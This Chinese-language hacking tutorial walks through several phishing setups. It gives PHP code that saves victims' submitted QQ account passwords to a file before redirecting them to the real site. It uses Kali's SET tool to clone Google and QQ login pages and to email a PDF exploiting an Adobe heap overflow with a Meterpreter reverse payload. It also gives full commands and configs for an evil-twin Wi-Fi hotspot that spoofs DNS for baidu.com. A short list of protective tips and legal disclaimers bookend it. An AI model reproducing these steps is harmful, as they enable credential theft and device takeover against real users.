黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

注:文章內容僅供參考學習,任何人不得用於非法

測試。請遵守國家法律,做一個守法的良好公民。0x00 服務器端搭建的釣魚頁面

這種釣魚頁面,較為常見,攻擊者註冊與相關網站類似的域名,然後利用該網站的主頁或登錄頁面進行誘騙,引誘被攻擊者輸入賬號密碼等個人信息。

這裡利用手裡閒置的阿里的一臺服務器給大家做一下演示,構造一個簡單的手機端釣魚頁面。

先來看一下後端的主要代碼:

[PHP] 純文本查看 複製代碼


if (isset($_POST["user"])) {

if (isset($_POST["pass"])) {

$myfile = fopen("fish.txt", "a") or die("Unable to open file!");

$txt = "賬號".$_POST["user"]." 密碼".$_POST["pass"];

fwrite($myfile, $txt);

fclose($myfile);

//在這裡他完成輸入之後進行跳轉

echo '';//echo是輸出函數,可以輸出文本或者變量


}

}

?>

可以看到在被攻擊者輸入賬號密碼以後,信息被提交到同目錄下的 fish.txt 中,然後進行網站的跳轉,跳轉到真實的 qq 空間頁面。

黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

該頁面的第一個選項是沒有用的,用戶只能點擊第二個選項,然後跳轉到如下頁面


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

在手機端是看不出什麼異常的,但是我們用電腦打開看看。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

在電腦端打開的網站,url 地址顯示的是該釣魚頁面搭建的服務器域名和地址。

如果在這裡我們輸入了賬號和密碼,信息就會到 fist.txt 中。

而且如果你的手機有qq空間app的客戶端,不管你輸入什麼,都是會直接跳轉到你的空間的,在你沒覺得有什麼事情發生時,你的信息就已經洩露了。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

x01 用 kali set 生成的釣魚網站

這裡我們先來利用 社會工程學工具包 SET 中自帶的模塊來生成 goole 的釣魚頁面。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

生成以後我們訪問該 ip 地址,可以看到是 goole 的登錄頁面,而且這個時候 kali 接受到一條訪問 ip 的信息,我們嘗試輸入信息,點擊登錄,kail中就可以直接得到信息。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

在倒數第二步我們選擇2.site clone ,還可以克隆其它頁面。這裡我又嘗試了去克隆 qq 空間的登錄頁面。

不過這裡我發現在你 qq 登錄的情況下,釣魚頁面會直接進入真正的 qq 空間的登錄頁面,而且如果你使用快捷登錄的方式或者掃碼登錄的方式,信息是不會被監聽到的。

0x02 用 kali set 發送釣魚郵件

這裡我們嘗試構造一個利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢出攻擊) 漏洞,然後默認將 Metasploit 中的 Meterpreter 反向攻擊荷載記載到 PDF 文件中,假如目標機中安裝有 Adobe Acrobat ,且存在該漏洞,我們就可以在對方打開文件時,釣魚成功。

下面是具體操作:


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

163郵箱的 SMTP 服務授權碼設置見下:


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

郵件發送成功就像這樣。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

但是,這個測試的時候,生成的帶有 Payload 的附件,有時候會被檢測出來。我們來查看這個報錯返回了什麼,報錯狀態碼為 554,我們查看後面的鏈接可以看到是因為附件被163檢測出來了。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

0x04 利用釣魚熱點釣魚

這次我們利用 kali 和一個無線網卡,來構造一個釣魚熱點,本地搭建 DNS 服務,修改 DNS 服務配置來欺騙受害者。

將 kali 與物理機進行橋接,與物理機在一個網段,然後插入無線網卡。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

因為要啟動 dhcp 服務,我們先給虛擬網卡 eth0 設置一個靜態 ip 地址,

[AppleScript] 純文本查看 複製代碼


gedit /etc/network/interfaces

iface eth0 inet static //說明靜態配置

auto eth0 //指定網卡

address 192.168.43.76 //配置靜態ip

netmask 255.255.255.0 //子網掩碼

gateway 192.168.43.1 //網關

重啟 kali 的網絡。之後我們將網卡 wlan0 設置為監聽模式

[AppleScript] 純文本查看 複製代碼

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

接下來我們使用命令airbase-ng -e CICO -c 11 wlan0mon去創建 WIFI 。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

保持該進程,重新打開一個終端,配置 wifi 網關。

ifconfig at0 up //啟動新建的 at0 虛擬網卡

gedit /etc/network/interfaces

auto at0

iface at0 inet static

address 192.168.1.1

netmask 255.255.255.0

重啟 kali 的網絡,可以看到 at0 已經有 ip 地址了。


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

接下來我們再來安裝配置 dhcp 服務,沒有該服務,手機無法連接釣魚 wifi。

安裝以後,我們設置一下網段,子網掩碼,網關地址,默認 dns 服務器地址,配置如下:


gedit /etc/dhcp/dhcpd.conf

subnet 192.168.1.0 netmask 255.255.255.0 {

range 192.168.1.100 192.168.1.150;

option routers 192.168.1.1;

option subnet-mask 255.255.255.0;

option domain-name-servers 192.168.43.76; }

將 at0 指定為 dhcp 的網卡。

gedit /etc/default/isc-dhcp-server

INTERFACESv4='at0'


黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

重新啟動 dhcp 服務。

下面我們來配置最重要的地方,就是 dns 服務,以 dnsmasq 為例,具體配置大家可以參考這篇文章。

https://sp4rkw.blog.csdn.net/article/details/101681716

我們之所以可以用該熱點釣魚成功就在於 dns 服務的配置,安裝以後我們進行如下配置:

gedit /etc/dnsmasq.conf

resolv-file=/etc/resolv.conf

strict-order

listen-address=192.168.43.76

address=/baidu.com/47.**.**.** //將域名解析到如下地址,該例中我嘗試將baidu.com的域名解析到我自己的服務器下。

server=8.8.8.8

server=114.114.114.114

黑客中間人攻擊,竊取你的隱私,你真的怕了嗎?

重啟 dnsmasq 服務。

打開 linux 內核的轉發模塊,並用 iptables 進行規制編寫,命令如下:


echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76

這裡我們就完成了釣魚熱點的搭建,連上熱點的手機訪問百度的域名都會被解析到我的服務器地址......

0x05 避免釣魚方法總結

(1.)不要隨意連公共的 WIFI 網絡。

(2.)涉及到賬戶,密碼等個人信息的提交登錄時,確保網絡環境可信。

(3.)儘量不使用賬號密碼的登錄方式登錄。

(4.)垃圾或者來歷不明的郵件附件不要查看。

(5.)別相信絕對安全。

注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。


分享到:


相關文章: